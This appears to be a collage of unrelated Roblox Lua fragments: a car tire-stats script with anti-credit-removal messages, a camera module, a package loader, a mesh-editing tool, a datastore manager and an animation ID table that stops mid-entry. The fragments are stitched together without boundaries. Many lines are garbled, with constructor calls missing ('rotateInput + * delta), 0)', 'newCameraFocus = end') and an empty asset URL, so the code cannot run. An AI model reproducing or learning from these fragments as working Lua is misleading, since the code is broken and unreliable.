and car.DriveSeat.TireStats.Ffweight.Value == 0 and car.DriveSeat.TireStats.TCS.Value == 0 and car.DriveSeat.TireStats.Lock.Value == 0 and car.DriveSeat.TireStats.Spin.Value == 0 and car.DriveSeat.TireStats.Rwear.Value == 0 and car.DriveSeat.TireStats.Rfriction.Value == 0 and car.DriveSeat.TireStats.Rminfriction.Value == 0 and car.DriveSeat.TireStats.Rfweight.Value == 0 and car.DriveSeat.TireStats.Reg.Value == 0 then STATREADER.Tires.Text = "Tires: Car Not Initialized" else STATREADER.Tires.Text = "Tires: Not Standard" end script:Destroy() else STATREADER.N.Text = "This is a product of Autoclub" STATREADER.C.Text = "So now restore the script to its original conditions," STATREADER.HP.Text = "Why are you trying to remove the logos?" STATREADER.HPB.Text = "it will be very appreciated," STATREADER.PSI.Text = "Idk man theres nothing wrong with showing the fact that you use our stuff," STATREADER.IC.Text = "don't do this, its very very petty" STATREADER.W.Text = "and especially if you're from another community" STATREADER.FI.Text = "Dont you think its kinda petty to remove the credits?" STATREADER.FD.Text = "and you're a HR" STATREADER.TS.Text = "you know you can be better than that," STATREADER.P2W.Text = "and it is a sign of maturity." STATREADER.Tires.Text = "-Autoclub Tire System" end else STATREADER.N.Text = "This is a product of Autoclub" STATREADER.C.Text = "So now restore the script to its original conditions," STATREADER.HP.Text = "Why are you trying to remove the logos?" STATREADER.HPB.Text = "it will be very appreciated," STATREADER.PSI.Text = "Idk man theres nothing wrong with showing the fact that you use our stuff," STATREADER.IC.Text = "don't do this, its very very petty" STATREADER.W.Text = "and especially if you're from another community" STATREADER.FI.Text = "Dont you think its kinda petty to remove the credits?" STATREADER.FD.Text = "and you're a HR" STATREADER.TS.Text = "you know you can be better than that," STATREADER.P2W.Text = "and it is a sign of maturity." STATREADER.Tires.Text = "-Autoclub Tire System" end
-- Movement mode standardized to Enum.ComputerCameraMovementMode values
function ClassicCamera:SetCameraMovementMode( cameraMovementMode ) BaseCamera.SetCameraMovementMode(self,cameraMovementMode) self.isFollowCamera = cameraMovementMode == Enum.ComputerCameraMovementMode.Follow end function ClassicCamera:Test() print("ClassicCamera:Test()") end function ClassicCamera:Update() local now = tick() local timeDelta = (now - self.lastUpdate) local camera = workspace.CurrentCamera local newCameraCFrame = camera.CFrame local newCameraFocus = camera.Focus local overrideCameraLookVector = nil if self.resetCameraAngle then local rootPart = self:GetHumanoidRootPart() if rootPart then overrideCameraLookVector = (rootPart.CFrame * INITIAL_CAMERA_ANGLE).lookVector else overrideCameraLookVector = INITIAL_CAMERA_ANGLE.lookVector end self.resetCameraAngle = false end local player = PlayersService.LocalPlayer local humanoid = self:GetHumanoid() local cameraSubject = camera.CameraSubject local isInVehicle = cameraSubject and cameraSubject:IsA('VehicleSeat') local isOnASkateboard = cameraSubject and cameraSubject:IsA('SkateboardPlatform') local isClimbing = humanoid and humanoid:GetState() == Enum.HumanoidStateType.Climbing if self.lastUpdate == nil or timeDelta > 1 then self.lastCameraTransform = nil end if self.lastUpdate then local gamepadRotation = self:UpdateGamepad() if self:ShouldUseVRRotation() then self.rotateInput = self.rotateInput + self:GetVRRotationInput() else -- Cap out the delta to 0.1 so we don't get some crazy things when we re-resume from local delta = math.min(0.1, timeDelta) if gamepadRotation ~= ZERO_VECTOR2 then self.rotateInput = self.rotateInput + (gamepadRotation * delta) end local angle = 0 if not (isInVehicle or isOnASkateboard) then angle = angle + (self.turningLeft and -120 or 0) angle = angle + (self.turningRight and 120 or 0) end if angle ~= 0 then self.rotateInput = self.rotateInput + * delta), 0) end end end -- Reset tween speed if user is panning if self.userPanningTheCamera then tweenSpeed = 0 self.lastUserPanCamera = tick() end local userRecentlyPannedCamera = now - self.lastUserPanCamera < TIME_BEFORE_AUTO_ROTATE local subjectPosition = self:GetSubjectPosition() if subjectPosition and player and camera then local zoom = self:GetCameraToSubjectDistance() if zoom < 0.5 then zoom = 0.5 end if self:GetIsMouseLocked() and not self:IsInFirstPerson() then -- We need to use the right vector of the camera after rotation, not before local newLookCFrame = self:CalculateNewLookCFrame(overrideCameraLookVector) local offset = self:GetMouseLockOffset() local cameraRelativeOffset = offset.X * newLookCFrame.rightVector + offset.Y * newLookCFrame.upVector + offset.Z * newLookCFrame.lookVector --offset can be NAN, NAN, NAN if newLookVector has only y component if Util.IsFiniteVector3(cameraRelativeOffset) then subjectPosition = subjectPosition + cameraRelativeOffset end else if not self.userPanningTheCamera and self.lastCameraTransform then local isInFirstPerson = self:IsInFirstPerson() if (isInVehicle or isOnASkateboard or (self.isFollowCamera and isClimbing)) and self.lastUpdate and humanoid and humanoid.Torso then if isInFirstPerson then if self.lastSubjectCFrame and (isInVehicle or isOnASkateboard) and cameraSubject:IsA('BasePart') then local y = -Util.GetAngleBetweenXZVectors(self.lastSubjectCFrame.lookVector, cameraSubject.CFrame.lookVector) if Util.IsFinite(y) then self.rotateInput = self.rotateInput +, 0) end tweenSpeed = 0 end elseif not userRecentlyPannedCamera then local forwardVector = humanoid.Torso.CFrame.lookVector if isOnASkateboard then forwardVector = cameraSubject.CFrame.lookVector end tweenSpeed = Util.Clamp(0, tweenMaxSpeed, tweenSpeed + tweenAcceleration * timeDelta) local percent = Util.Clamp(0, 1, tweenSpeed * timeDelta) if self:IsInFirstPerson() and not (self.isFollowCamera and self.isClimbing) then percent = 1 end local y = Util.GetAngleBetweenXZVectors(forwardVector, self:GetCameraLookVector()) if Util.IsFinite(y) and math.abs(y) > 0.0001 then self.rotateInput = self.rotateInput + * percent, 0) end end elseif self.isFollowCamera and (not (isInFirstPerson or userRecentlyPannedCamera) and not VRService.VREnabled) then -- Logic that was unique to the old FollowCamera module local lastVec = -(self.lastCameraTransform.p - subjectPosition) local y = Util.GetAngleBetweenXZVectors(lastVec, self:GetCameraLookVector()) -- This cutoff is to decide if the humanoid's angle of movement, -- relative to the camera's look vector, is enough that -- we want the camera to be following them. The point is to provide -- a sizable dead zone to allow more precise forward movements. local thetaCutoff = 0.4 -- Check for NaNs if Util.IsFinite(y) and math.abs(y) > 0.0001 and math.abs(y) > thetaCutoff * timeDelta then self.rotateInput = self.rotateInput +, 0) end end end end if not self.isFollowCamera then local VREnabled = VRService.VREnabled if VREnabled then newCameraFocus = self:GetVRFocus(subjectPosition, timeDelta) else newCameraFocus = end local cameraFocusP = newCameraFocus.p if VREnabled and not self:IsInFirstPerson() then local cameraHeight = self:GetCameraHeight() local vecToSubject = (subjectPosition - camera.CFrame.p) local distToSubject = vecToSubject.magnitude -- Only move the camera if it exceeded a maximum distance to the subject in VR if distToSubject > zoom or self.rotateInput.x ~= 0 then local desiredDist = math.min(distToSubject, zoom) vecToSubject = self:CalculateNewLookVectorVR() * desiredDist local newPos = cameraFocusP - vecToSubject local desiredLookDir = camera.CFrame.lookVector if self.rotateInput.x ~= 0 then desiredLookDir = vecToSubject end local lookAt = + desiredLookDir.x, newPos.y, newPos.z + desiredLookDir.z) self.rotateInput = ZERO_VECTOR2 newCameraCFrame =, lookAt) +, cameraHeight, 0) end else local newLookVector = self:CalculateNewLookVector(overrideCameraLookVector) self.rotateInput = ZERO_VECTOR2 newCameraCFrame = - (zoom * newLookVector), cameraFocusP) end else -- is FollowCamera local newLookVector = self:CalculateNewLookVector(overrideCameraLookVector) self.rotateInput = ZERO_VECTOR2 if VRService.VREnabled then newCameraFocus = self:GetVRFocus(subjectPosition, timeDelta) else newCameraFocus = end newCameraCFrame = - (zoom * newLookVector), newCameraFocus.p) +, self:GetCameraHeight(), 0) end self.lastCameraTransform = newCameraCFrame self.lastCameraFocus = newCameraFocus if (isInVehicle or isOnASkateboard) and cameraSubject:IsA('BasePart') then self.lastSubjectCFrame = cameraSubject.CFrame else self.lastSubjectCFrame = nil end end self.lastUpdate = now return newCameraCFrame, newCameraFocus end function ClassicCamera:EnterFirstPerson() self.inFirstPerson = true self:UpdateMouseBehavior() end function ClassicCamera:LeaveFirstPerson() self.inFirstPerson = false self:UpdateMouseBehavior() end return ClassicCamera
--[=[ Bootstraps the game by replicating packages to server, client, and shared. ```lua local ServerScriptService = game:GetService("ServerScriptService") local loader = ServerScriptService:FindFirstChild("LoaderUtils", true).Parent local packages = require(loader).bootstrapGame(ServerScriptService.ik) ``` :::info The game must be running to do this bootstrapping operation. ::: @server @function bootstrapGame @param packageFolder Instance @return Folder -- serverFolder @within Loader ]=]
local function bootstrapGame(packageFolder) assert(RunService:IsRunning(), "Game must be running") loader:Lock() local clientFolder, serverFolder, sharedFolder = LoaderUtils.toWallyFormat(packageFolder) clientFolder.Parent = ReplicatedStorage sharedFolder.Parent = ReplicatedStorage serverFolder.Parent = ServerScriptService return serverFolder end
-- Container for temporary connections (disconnected automatically)
local Connections = {}; function MeshTool.Equip() -- Enables the tool's equipped functionality -- Start up our interface ShowUI(); end; function MeshTool.Unequip() -- Disables the tool's equipped functionality -- Clear unnecessary resources HideUI(); ClearConnections(); end; function ClearConnections() -- Clears out temporary connections for ConnectionKey, Connection in pairs(Connections) do Connection:Disconnect(); Connections[ConnectionKey] = nil; end; end; function ShowUI() -- Creates and reveals the UI -- Reveal UI if already created if MeshTool.UI then -- Reveal the UI MeshTool.UI.Visible = true; -- Update the UI every 0.1 seconds UIUpdater = Support.ScheduleRecurringTask(UpdateUI, 0.1); -- Skip UI creation return; end; -- Create the UI MeshTool.UI = Core.Tool.Interfaces.BTMeshToolGUI:Clone(); MeshTool.UI.Parent = Core.UI; MeshTool.UI.Visible = true; local AddButton = MeshTool.UI.AddButton; local RemoveButton = MeshTool.UI.RemoveButton; local MeshIdInput = MeshTool.UI.MeshIdOption.TextBox; local TextureIdInput = MeshTool.UI.TextureIdOption.TextBox; local VertexColorInput = MeshTool.UI.TintOption.HSVPicker; MeshTypes = { Block = Enum.MeshType.Brick, Cylinder = Enum.MeshType.Cylinder, File = Enum.MeshType.FileMesh, Head = Enum.MeshType.Head, Sphere = Enum.MeshType.Sphere, Wedge = Enum.MeshType.Wedge }; -- Sort the mesh types SortedMeshTypes = Support.Keys(MeshTypes); table.sort(SortedMeshTypes); -- Create the mesh type dropdown TypeDropdown = Core.Cheer(MeshTool.UI.TypeOption.Dropdown).Start(SortedMeshTypes, '', function (Type) SetProperty('MeshType', MeshTypes[Type]); end); -- Enable the scale inputs local XScaleInput = MeshTool.UI.ScaleOption.XInput.TextBox; local YScaleInput = MeshTool.UI.ScaleOption.YInput.TextBox; local ZScaleInput = MeshTool.UI.ScaleOption.ZInput.TextBox; XScaleInput.FocusLost:Connect(function (EnterPressed) local NewScale = tonumber(XScaleInput.Text); SetAxisScale('X', NewScale); end); YScaleInput.FocusLost:Connect(function (EnterPressed) local NewScale = tonumber(YScaleInput.Text); SetAxisScale('Y', NewScale); end); ZScaleInput.FocusLost:Connect(function (EnterPressed) local NewScale = tonumber(ZScaleInput.Text); SetAxisScale('Z', NewScale); end); -- Enable the offset inputs local XOffsetInput = MeshTool.UI.OffsetOption.XInput.TextBox; local YOffsetInput = MeshTool.UI.OffsetOption.YInput.TextBox; local ZOffsetInput = MeshTool.UI.OffsetOption.ZInput.TextBox; XOffsetInput.FocusLost:Connect(function (EnterPressed) local NewOffset = tonumber(XOffsetInput.Text); SetAxisOffset('X', NewOffset); end); YOffsetInput.FocusLost:Connect(function (EnterPressed) local NewOffset = tonumber(YOffsetInput.Text); SetAxisOffset('Y', NewOffset); end); ZOffsetInput.FocusLost:Connect(function (EnterPressed) local NewOffset = tonumber(ZOffsetInput.Text); SetAxisOffset('Z', NewOffset); end); -- Enable the mesh ID input MeshIdInput.FocusLost:Connect(function (EnterPressed) SetMeshId(ParseAssetId(MeshIdInput.Text)); end); -- Enable the texture ID input TextureIdInput.FocusLost:Connect(function (EnterPressed) SetTextureId(ParseAssetId(TextureIdInput.Text)); end); -- Enable the vertex color/tint option VertexColorInput.MouseButton1Click:Connect(function () Core.Cheer(Core.Tool.Interfaces.BTHSVColorPicker, Core.UI).Start( VectorToColor(Support.IdentifyCommonProperty(GetMeshes(), 'VertexColor')) or, 1, 1), function (Color) SetProperty('VertexColor', ColorToVector(Color)) end, Core.Targeting.CancelSelecting ); end); -- Enable the mesh adding button AddButton.Button.MouseButton1Click:Connect(function () AddMeshes(); end); RemoveButton.Button.MouseButton1Click:Connect(function () RemoveMeshes(); end); -- Update the UI every 0.1 seconds UIUpdater = Support.ScheduleRecurringTask(UpdateUI, 0.1); end; function UpdateUI() -- Updates information on the UI -- Make sure the UI's on if not MeshTool.UI then return; end; -- Get all meshes local Meshes = GetMeshes(); -- Identify all common properties local MeshType = Support.IdentifyCommonProperty(Meshes, 'MeshType'); local MeshId = Support.IdentifyCommonProperty(Meshes, 'MeshId'); local TextureId = Support.IdentifyCommonProperty(Meshes, 'TextureId'); local VertexColor = VectorToColor(Support.IdentifyCommonProperty(Meshes, 'VertexColor')); -- Check if there's a file mesh in the selection local FileMeshInSelection = false; for _, Mesh in pairs(GetMeshes()) do if Mesh.MeshType == Enum.MeshType.FileMesh then FileMeshInSelection = true; break; end; end; -- Identify common scales and offsets across axes local XScaleVariations, YScaleVariations, ZScaleVariations = {}, {}, {}; local XOffsetVariations, YOffsetVariations, ZOffsetVariations = {}, {}, {}; for _, Mesh in pairs(GetMeshes()) do table.insert(XScaleVariations, Support.Round(Mesh.Scale.X, 3)); table.insert(YScaleVariations, Support.Round(Mesh.Scale.Y, 3)); table.insert(ZScaleVariations, Support.Round(Mesh.Scale.Z, 3)); table.insert(XOffsetVariations, Support.Round(Mesh.Offset.X, 3)); table.insert(YOffsetVariations, Support.Round(Mesh.Offset.Y, 3)); table.insert(ZOffsetVariations, Support.Round(Mesh.Offset.Z, 3)); end; local CommonXScale = Support.IdentifyCommonItem(XScaleVariations); local CommonYScale = Support.IdentifyCommonItem(YScaleVariations); local CommonZScale = Support.IdentifyCommonItem(ZScaleVariations); local CommonXOffset = Support.IdentifyCommonItem(XOffsetVariations); local CommonYOffset = Support.IdentifyCommonItem(YOffsetVariations); local CommonZOffset = Support.IdentifyCommonItem(ZOffsetVariations); -- Shortcuts to updating UI elements local AddButton = MeshTool.UI.AddButton; local RemoveButton = MeshTool.UI.RemoveButton; local MeshTypeDropdown = MeshTool.UI.TypeOption.Dropdown; local MeshIdInput = MeshTool.UI.MeshIdOption.TextBox; local TextureIdInput = MeshTool.UI.TextureIdOption.TextBox; local VertexColorIndicator = MeshTool.UI.TintOption.Indicator; local XScaleInput = MeshTool.UI.ScaleOption.XInput.TextBox; local YScaleInput = MeshTool.UI.ScaleOption.YInput.TextBox; local ZScaleInput = MeshTool.UI.ScaleOption.ZInput.TextBox; local XOffsetInput = MeshTool.UI.OffsetOption.XInput.TextBox; local YOffsetInput = MeshTool.UI.OffsetOption.YInput.TextBox; local ZOffsetInput = MeshTool.UI.OffsetOption.ZInput.TextBox; -- Update the inputs UpdateDataInputs { [MeshIdInput] = MeshId and ParseAssetId(MeshId) or MeshId or '*'; [TextureIdInput] = TextureId and ParseAssetId(TextureId) or TextureId or '*'; [XScaleInput] = CommonXScale or '*'; [YScaleInput] = CommonYScale or '*'; [ZScaleInput] = CommonZScale or '*'; [XOffsetInput] = CommonXOffset or '*'; [YOffsetInput] = CommonYOffset or '*'; [ZOffsetInput] = CommonZOffset or '*'; }; UpdateColorIndicator(VertexColorIndicator, VertexColor); local MeshTypeLabel = Support.FindTableOccurrence(MeshTypes, MeshType); TypeDropdown.SetOption(MeshTypeLabel and MeshTypeLabel or '*'); AddButton.Visible = false; RemoveButton.Visible = false; MeshTool.UI.TypeOption.Visible = false; MeshIdInput.Parent.Visible = false; TextureIdInput.Parent.Visible = false; VertexColorIndicator.Parent.Visible = false; MeshTool.UI.ScaleOption.Visible = false; MeshTool.UI.OffsetOption.Visible = false; -- Update the UI to display options depending on the mesh type local DisplayedItems; if #Meshes == 0 then DisplayedItems = { AddButton }; -- Each selected part has a mesh, including a file mesh elseif #Meshes == #Selection.Parts and FileMeshInSelection then DisplayedItems = { MeshTool.UI.TypeOption, MeshTool.UI.ScaleOption, MeshTool.UI.OffsetOption, MeshIdInput.Parent, TextureIdInput.Parent, VertexColorIndicator.Parent, RemoveButton }; -- Each selected part has a mesh elseif #Meshes == #Selection.Parts and not FileMeshInSelection then DisplayedItems = { MeshTool.UI.TypeOption, MeshTool.UI.ScaleOption, MeshTool.UI.OffsetOption, RemoveButton }; -- Only some selected parts have meshes, including a file mesh elseif #Meshes ~= #Selection.Parts and FileMeshInSelection then DisplayedItems = { AddButton, MeshTool.UI.TypeOption, MeshTool.UI.ScaleOption, MeshTool.UI.OffsetOption, MeshIdInput.Parent, TextureIdInput.Parent, VertexColorIndicator.Parent, RemoveButton }; -- Only some selected parts have meshes elseif #Meshes ~= #Selection.Parts and not FileMeshInSelection then DisplayedItems = { AddButton, MeshTool.UI.TypeOption, MeshTool.UI.ScaleOption, MeshTool.UI.OffsetOption, RemoveButton }; end; -- Display the relevant UI elements DisplayLinearLayout(DisplayedItems, MeshTool.UI,, 0, 0, 20), 10); end; function HideUI() -- Hides the tool UI -- Make sure there's a UI if not MeshTool.UI then return; end; -- Hide the UI MeshTool.UI.Visible = false; -- Stop updating the UI UIUpdater:Stop(); end; function GetMeshes() -- Returns all the meshes in the selection local Meshes = {}; -- Get any meshes from any selected parts for _, Part in pairs(Selection.Parts) do table.insert(Meshes, Support.GetChildOfClass(Part, 'SpecialMesh')); end; -- Return the meshes return Meshes; end; function ParseAssetId(Input) -- Returns the intended asset ID for the given input -- Get the ID number from the input local Id = tonumber(Input) or tonumber(Input:lower():match('%?id=([0-9]+)')) or tonumber(Input:match('/([0-9]+)/')) or tonumber(Input:lower():match('rbxassetid://([0-9]+)')); -- Return the ID return Id; end; function VectorToColor(Vector) -- Returns the Color3 with the values in the given Vector3 -- Make sure that the given Vector3 is valid if not Vector then return end; -- Return the Color3 return, Vector.Y, Vector.Z); end; function ColorToVector(Color) -- Returns the Vector3 with the values in the given Color3 -- Make sure that the given Color3 is valid if not Color then return end; -- Return the Vector3 return, Color.g, Color.b); end; function UpdateDataInputs(Data) -- Updates the data in the given TextBoxes when the user isn't typing in them -- Go through the inputs and data for Input, UpdatedValue in pairs(Data) do -- Makwe sure the user isn't typing into the input if not Input:IsFocused() then -- Set the input's value Input.Text = tostring(UpdatedValue); end; end; end; function UpdateColorIndicator(Indicator, Color) -- Updates the given color indicator -- If there is a single color, just display it if Color then Indicator.BackgroundColor3 = Color; Indicator.Varies.Text = ''; -- If the colors vary, display a * on a gray background else Indicator.BackgroundColor3 =, 222/255, 222/255); Indicator.Varies.Text = '*'; end; end; function DisplayLinearLayout(Items, Container, StartPosition, Padding) -- Keep track of the total vertical extents of all items local Sum = 0; -- Go through each item for ItemIndex, Item in ipairs(Items) do -- Make the item visible Item.Visible = true; -- Position this item underneath the past items Item.Position = StartPosition + Item.Position.X.Scale, Item.Position.X.Offset, 0, Sum + Padding ); -- Update the sum of item heights Sum = Sum + Padding + Item.AbsoluteSize.Y; end; -- Resize the container to fit the new layout Container.Size =, 200, 0, 30 + Sum); end; function AddMeshes() -- Prepare the change request for the server local Changes = {}; -- Go through the selection for _, Part in pairs(Selection.Parts) do -- Make sure this part doesn't already have a mesh if not Support.GetChildOfClass(Part, 'SpecialMesh') then -- Queue a mesh to be created for this part table.insert(Changes, { Part = Part }); end; end; -- Send the change request to the server local Meshes = Core.SyncAPI:Invoke('CreateMeshes', Changes); -- Put together the history record local HistoryRecord = { Meshes = Meshes; Selection = Selection.Items; Unapply = function (Record) -- Reverts this change -- Select changed parts Selection.Replace(Record.Selection) -- Remove the meshes Core.SyncAPI:Invoke('Remove', Record.Meshes); end; Apply = function (Record) -- Reapplies this change -- Restore the meshes Core.SyncAPI:Invoke('UndoRemove', Record.Meshes); -- Select changed parts Selection.Replace(Record.Selection) end; }; -- Register the history record Core.History.Add(HistoryRecord); end; function RemoveMeshes() -- Get all the meshes in the selection local Meshes = GetMeshes(); -- Create the history record local HistoryRecord = { Meshes = Meshes; Selection = Selection.Items; Unapply = function (Record) -- Reverts this change -- Restore the meshes Core.SyncAPI:Invoke('UndoRemove', Record.Meshes); -- Select changed parts Selection.Replace(Record.Selection) end; Apply = function (Record) -- Reapplies this change -- Select changed parts Selection.Replace(Record.Selection) -- Remove the meshes Core.SyncAPI:Invoke('Remove', Record.Meshes); end; }; -- Send the removal request Core.SyncAPI:Invoke('Remove', Meshes); -- Register the history record Core.History.Add(HistoryRecord); end; function SetProperty(Property, Value) -- Make sure the given value is valid if not Value then return; end; -- Start a history record TrackChange(); -- Go through each mesh for _, Mesh in pairs(GetMeshes()) do -- Store the state of the mesh before modification table.insert(HistoryRecord.Before, { Part = Mesh.Parent, [Property] = Mesh[Property] }); -- Create the change request for this mesh table.insert(HistoryRecord.After, { Part = Mesh.Parent, [Property] = Value }); end; -- Register the changes RegisterChange(); end; function SetAxisScale(Axis, Scale) -- Sets the selection's scale on axis `Axis` to `Scale` -- Start a history record TrackChange(); -- Go through each mesh for _, Mesh in pairs(GetMeshes()) do -- Store the state of the mesh before modification table.insert(HistoryRecord.Before, { Part = Mesh.Parent, Scale = Mesh.Scale }); -- Put together the changed scale local Scale = Axis == 'X' and Scale or Mesh.Scale.X, Axis == 'Y' and Scale or Mesh.Scale.Y, Axis == 'Z' and Scale or Mesh.Scale.Z ); -- Create the change request for this mesh table.insert(HistoryRecord.After, { Part = Mesh.Parent, Scale = Scale }); end; -- Register the changes RegisterChange(); end; function SetAxisOffset(Axis, Offset) -- Sets the selection's offset on axis `Axis` to `Offset` -- Start a history record TrackChange(); -- Go through each mesh for _, Mesh in pairs(GetMeshes()) do -- Store the state of the mesh before modification table.insert(HistoryRecord.Before, { Part = Mesh.Parent, Offset = Mesh.Offset }); -- Put together the changed scale local Offset = Axis == 'X' and Offset or Mesh.Offset.X, Axis == 'Y' and Offset or Mesh.Offset.Y, Axis == 'Z' and Offset or Mesh.Offset.Z ); -- Create the change request for this mesh table.insert(HistoryRecord.After, { Part = Mesh.Parent, Offset = Offset }); end; -- Register the changes RegisterChange(); end; function SetMeshId(AssetId) -- Sets the meshes in the selection's mesh ID to the intended, given mesh asset -- Make sure the given asset ID is valid if not AssetId then return; end; -- Prepare the change request local Changes = { MeshId = 'rbxassetid://' .. AssetId; }; -- Attempt a mesh extraction on the given asset Core.Try(Core.SyncAPI.Invoke, Core.SyncAPI, 'ExtractMeshFromAsset', AssetId) :Then(function (ExtractionData) -- Ensure extraction succeeded assert(ExtractionData.success, 'Extraction failed'); -- Apply any mesh found local MeshId = ExtractionData.meshID; if MeshId then Changes.MeshId = 'rbxassetid://' .. MeshId; end; -- Apply any texture found local TextureId = ExtractionData.textureID; if TextureId then Changes.TextureId = 'rbxassetid://' .. TextureId; end; -- Apply any vertex color found local VertexColor = ExtractionData.tint; if VertexColor then Changes.VertexColor =, VertexColor.y, VertexColor.z); end; -- Apply any scale found local Scale = ExtractionData.scale; if Scale then Changes.Scale =, Scale.y, Scale.z); end; end); -- Start a history record TrackChange(); -- Go through each mesh for _, Mesh in pairs(GetMeshes()) do -- Create the history change requests for this mesh local Before, After = { Part = Mesh.Parent }, { Part = Mesh.Parent }; -- Gather change information to finish up the history change requests for Property, Value in pairs(Changes) do Before[Property] = Mesh[Property]; After[Property] = Value; end; -- Store the state of the mesh before modification table.insert(HistoryRecord.Before, Before); -- Create the change request for this mesh table.insert(HistoryRecord.After, After); end; -- Register the changes RegisterChange(); end; function SetTextureId(AssetId) -- Sets the meshes in the selection's texture ID to the intended, given image asset -- Make sure the given asset ID is valid if not AssetId then return; end; -- Prepare the change request local Changes = { TextureId = 'rbxassetid://' .. AssetId; }; -- Attempt an image extraction on the given asset Core.Try(Core.SyncAPI.Invoke, Core.SyncAPI, 'ExtractImageFromDecal', AssetId) :Then(function (ExtractedImage) Changes.TextureId = 'rbxassetid://' .. ExtractedImage; end); -- Start a history record TrackChange(); -- Go through each mesh for _, Mesh in pairs(GetMeshes()) do -- Create the history change requests for this mesh local Before, After = { Part = Mesh.Parent }, { Part = Mesh.Parent }; -- Gather change information to finish up the history change requests for Property, Value in pairs(Changes) do Before[Property] = Mesh[Property]; After[Property] = Value; end; -- Store the state of the mesh before modification table.insert(HistoryRecord.Before, Before); -- Create the change request for this mesh table.insert(HistoryRecord.After, After); end; -- Register the changes RegisterChange(); end; function TrackChange() -- Start the record HistoryRecord = { Before = {}; After = {}; Selection = Selection.Items; Unapply = function (Record) -- Reverts this change -- Select the changed parts Selection.Replace(Record.Selection) -- Send the change request Core.SyncAPI:Invoke('SyncMesh', Record.Before); end; Apply = function (Record) -- Applies this change -- Select the changed parts Selection.Replace(Record.Selection) -- Send the change request Core.SyncAPI:Invoke('SyncMesh', Record.After); end; }; end; function RegisterChange() -- Finishes creating the history record and registers it -- Make sure there's an in-progress history record if not HistoryRecord then return; end; -- Send the change to the server Core.SyncAPI:Invoke('SyncMesh', HistoryRecord.After); -- Register the record and clear the staging Core.History.Add(HistoryRecord); HistoryRecord = nil; end;
--[[ LocalCrosshairUI Description: This script listens for newly equipped weapons on the player. Anytime a weapon is equipped the spread simulation for the weapons runtime is retreieved and and display on screen as a white circle. Throwables don't have spread so it'll just show up as a small circle. ]]
--[=[ Removes all player data stores, and returns a promise that resolves when all pending saves are saved. @return Promise ]=]
function PlayerDataStoreManager:PromiseAllSaves() for player, _ in pairs(self._datastores) do self:_removePlayerDataStore(player) end return self._maid:GivePromise(PromiseUtils.all(self._pendingSaves:GetAll())) end function PlayerDataStoreManager:_createDataStore(player) assert(not self._datastores[player], "Bad player") local datastore =, self:_getKey(player)) self._maid._savingConns[player] = datastore.Saving:Connect(function(promise) self._pendingSaves:Add(promise) end) self._datastores[player] = datastore return datastore end function PlayerDataStoreManager:_removePlayerDataStore(player) assert(typeof(player) == "Instance", "Bad player") assert(player:IsA("Player"), "Bad player") local datastore = self._datastores[player] if not datastore then return end self._removing[player] = true local removingPromises = {} for _, func in pairs(self._removingCallbacks) do local result = func(player) if Promise.isPromise(result) then table.insert(removingPromises, result) end end PromiseUtils.all(removingPromises) :Then(function() return datastore:Save() end) :Finally(function() datastore:Destroy() self._removing[player] = nil end) -- Prevent double removal or additional issues self._datastores[player] = nil self._maid._savingConns[player] = nil end function PlayerDataStoreManager:_getKey(player) return self._keyGenerator(player) end return PlayerDataStoreManager
--TheNexusAvenger --Centralizes storing and playing animations. --Unless non-Roblox animations become public, the R15 animations will not work.
local ASSET_URL = "" local Animationids Animationids = { --Bomb ["BombHold"] = { [Enum.HumanoidRigType.R6] = ASSET_URL.."94861246", [Enum.HumanoidRigType.R15] = ASSET_URL.."2016146879", }, ["BombThrow"] = { [Enum.HumanoidRigType.R6] = ASSET_URL.."94861252", [Enum.HumanoidRigType.R15] = ASSET_URL.."2016149562", }, --Broom ["BroomIdle"] = { [Enum.HumanoidRigType.R6] = ASSET_URL.."101074752", [Enum.HumanoidRigType.R15] = ASSET_URL.."2016194803", }, ["BroomWhack"] = { [Enum.HumanoidRigType.R6] = ASSET_URL.."101078539", [Enum.HumanoidRigType.R15] = ASSET_URL.."2016197675", }, --Reflector ["ReflectorActivate"] = { [Enum.HumanoidRigType.R6] = ASSET_URL.."94190213", [Enum.HumanoidRigType.R15] = ASSET_URL.."2016204897", }, --Rocket Launcher ["RocketLauncherFireAndReload"] = { [Enum.HumanoidRigType.R6] = ASSET_URL.."94771598", [Enum.HumanoidRigType.R15] = ASSET_URL.."1937739969" }, --Slingshot ["SlingshotEquip"] = { [Enum.HumanoidRigType.R6] = ASSET_URL.."94123357", [Enum.HumanoidRigType.R15] = ASSET_URL.."2016224711", }, ["SlingshotShoot"] = { [Enum.HumanoidRigType.R6] = ASSET_URL.."94126022", [Enum.HumanoidRigType.R15] = ASSET_URL.."2016213090", }, --Superball ["SuperballEquip"] = { [Enum.HumanoidRigType.R6] = ASSET_URL.."94156535", [Enum.HumanoidRigType.R15] = ASSET_URL.."2016244952", }, ["SuperballUnequip"] = { [Enum.HumanoidRigType.R6] = ASSET_URL.."94156580", --Unused }, ["SuperballIdle"] = { [Enum.HumanoidRigType.R6] = ASSET_URL.."94156486", [Enum.HumanoidRigType.R15] = ASSET_URL.."2016239591", }, ["SuperballThrow"] = { [Enum.HumanoidRigType.R6] = ASSET_URL.."94157627", [Enum.HumanoidRigType.R15] = ASSET_URL.."2016242911", }, --Sword ["SwordEquip"] = { [Enum.HumanoidRigType.R6] = ASSET_URL.."94160581", [Enum.HumanoidRigType.R15] = ASSET_URL.."2016251903", }, ["SwordUnequip"] = { [Enum.HumanoidRigType.R6] = ASSET_URL.."94095929", [Enum.HumanoidRigType.R15] = ASSET_URL.."2016265405", }, ["SwordIdle"] = { [Enum.HumanoidRigType.R6] = ASSET_URL.."94108418", [Enum.HumanoidRigType.R15] = ASSET_URL.."2016254882", }, ["SwordSlash"] = { [Enum.HumanoidRigType.R6] = ASSET_URL.."94161088", [Enum.HumanoidRigType.R15] = ASSET_URL.."2016260994", }, ["SwordThrust"] = { [Enum.HumanoidRigType.R6] = ASSET_URL.."94161333", [Enum.HumanoidRigType.R15] = ASSET_URL.."2016262978", }, ["SwordOverhead"] = { [Enum.HumanoidRigType.R6] = ASSET_URL.."94160738", [Enum.HumanoidRigType.R15] = ASSET_URL.."2016256809", }, --Lobby Flag ["FlagPlant"] = { [Enum.HumanoidRigType.R6] = ASSET_URL.."74897796", [Enum.HumanoidRigType.R15] = ASSET_URL.."2016269660", } } local AnimationSettings = { --Bomb ["BombHold"] = { FadeTime = 0, Weight = 1, Speed = 2, }, --Broom ["BroomWhack"] = { FadeTime = 0, Weight = 1, Speed = 10, --Should be BROOM_WHACK_SPEED }, --Reflector ["ReflectorActivate"] = { FadeTime = 0.1, Weight = 1, Speed = 6, }, --Rocket Launcher ["RocketLauncherFireAndReload"] = { FadeTime = 0.1, Weight = 1, 